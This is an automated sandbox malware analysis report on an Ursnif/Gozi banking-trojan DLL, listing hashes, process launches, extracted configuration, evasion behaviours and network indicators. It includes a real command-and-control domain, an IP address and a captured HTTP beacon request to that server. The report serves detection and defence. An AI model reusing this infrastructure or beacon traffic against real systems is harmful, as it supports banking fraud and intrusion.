Loading ...

Play interactive tourEdit tour

Analysis Report plushaaf

Overview

General Information

Sample Name:plushaaf (renamed file extension from none to dll)
Analysis ID:288964
MD5:a4aa5f69df4a8c36f28e8207c5b1fea7
SHA1:59230dbb70126eae831cae6ef10155884f6f2a67
SHA256:06dd35ce0c9b164f9ecafc4269d91fb8a23634d541ec455dfcd4dcd624523f4b
Tags:dllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Creates a COM Internet Explorer object
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4848 cmdline: loaddll32.exe 'C:\Users\user\Desktop\plushaaf.dll' MD5: 6A3082E6152C823BF9EB895EA06EA605)
    • rundll32.exe (PID: 6768 cmdline: C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 160 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Eachtrue MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1100 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Fellhard MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2712 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Locategun MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5260 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Maincontinent MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3564 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4704 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250155", "uptime": "256", "system": "6628654b458301cf506f0279b6410f5b", "size": "0", "crc": "1", "action": "00000000", "id": "2200", "time": "1600876544", "user": "f73be0088695dc15e71ab15c39bc2cb6", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://api10.laptok.at/api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ovAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: rundll32.exe.6768.1.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250155", "uptime": "256", "system": "6628654b458301cf506f0279b6410f5b", "size": "0", "crc": "1", "action": "00000000", "id": "2200", "time": "1600876544", "user": "f73be0088695dc15e71ab15c39bc2cb6", "hash": "0x00000000", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00AE57FE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5915A0 FindFirstFileExA,1_2_6E5915A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_012757FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_012757FE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033D57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_033D57FE

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 8.208.101.13 8.208.101.13
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ov1xSHx6SdYcmol5Kv76OU/aK_2FLVwPBg49/8yDnBmfe/W3Q77E7hq_2Fz5zB5WNabEU/W_2BgBDPQ2/XwDNVmEPWkTUOyX45/FtWMM1S3Mlb5/q57ZgbU9UCc/zIn2pTu5MlT1YU/IevW40wth8AGgEe5uqNZm/rJqyOa3p9D26E63r/_2FRfKV3VeKxm_2/Fj0hJ9quz0FmoYr8zt/_0A_0DnZh/UpYnGnJt442sl5zeHrXp/_2FENWuhtD_2FoAL6rK/z0yNekWHZ89LREkTZPhi_2/BdyvujvpJ/M HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x135fa748,0x01d691c2</date><accdate>0x135fa748,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x135fa748,0x01d691c2</date><accdate>0x135fa748,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.21.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Sep 2020 06:55:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {3D0C201C-FDB5-11EA-90E2-ECF4BB862DED}.dat.21.dr, ~DF281A5094B7740677.TMP.21.drString found in binary or memory: http://api10.laptok.at/api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ov
            Source: msapplication.xml.21.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.21.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.21.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.21.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.21.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.21.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.21.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.21.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

            System Summary:

            barindex
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E541613 GetProcAddress,NtCreateSection,memset,1_2_6E541613
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E541FFC NtMapViewOfSection,1_2_6E541FFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5424D5 NtQueryVirtualMemory,1_2_6E5424D5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_00AE143A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEB115 NtQueryVirtualMemory,1_2_00AEB115
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_0127143A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127B115 NtQueryVirtualMemory,2_2_0127B115
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033D143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_033D143A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033DB115 NtQueryVirtualMemory,3_2_033DB115
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5422B41_2_6E5422B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEAEF41_2_00AEAEF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE639D1_2_00AE639D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5695F01_2_6E5695F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E574C001_2_6E574C00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56AA101_2_6E56AA10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127639D2_2_0127639D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127AEF42_2_0127AEF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033D639D3_2_033D639D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033DAEF43_2_033DAEF4
            Source: plushaaf.dllBinary or memory string: OriginalFilenamewood.dll0 vs plushaaf.dll
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal80.bank.troj.winDLL@14/23@1/1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AE16E8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00AE16E8
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\LowJump to behavior
            Source: plushaaf.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\plushaaf.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Eachtrue
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Fellhard
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Locategun
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Maincontinent
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,EachtrueJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,FellhardJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,LocategunJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,MaincontinentJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: plushaaf.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: plushaaf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: e:\5\Skin\like\Picture\experiment\2\Atom\69\89\21\Good\65\string\35\our\wood.pdb source: rundll32.exe, 00000001.00000002.633302638.000000006E5A3000.00000002.00020000.sdmp, plushaaf.dll
            Source: plushaaf.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: plushaaf.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: plushaaf.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: plushaaf.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: plushaaf.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E542250 push ecx; ret 1_2_6E542259
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E54E67F push 00000038h; retf 1_2_6E54E681
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E54EFCD pushfd ; iretd 1_2_6E54EFCE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E54E998 push 65882003h; ret 1_2_6E54E99D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5422A3 push ecx; ret 1_2_6E5422B3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEE895 push 00000038h; retf 1_2_00AEE897
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEAEE3 push ecx; ret 1_2_00AEAEF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEE6C6 push ebp; ret 1_2_00AEE6C7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEABB0 push ecx; ret 1_2_00AEABB9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00AEE548 push esi; retf 1_2_00AEE549
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5C2609 push ds; iretd 1_2_6E5C260A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5C2F42 push ebp; iretd 1_2_6E5C2F98
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E5C2F2D push edx; retf 1_2_6E5C2F2E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127ABB0 push ecx; ret 2_2_0127ABB9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0127AEE3 push ecx; ret 2_2_0127AEF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033DABB0 push ecx; ret 3_2_033DABB9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_033DAEE3 push ecx; ret 3_2_033DAEF3

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56AA10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_6E56AA10
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
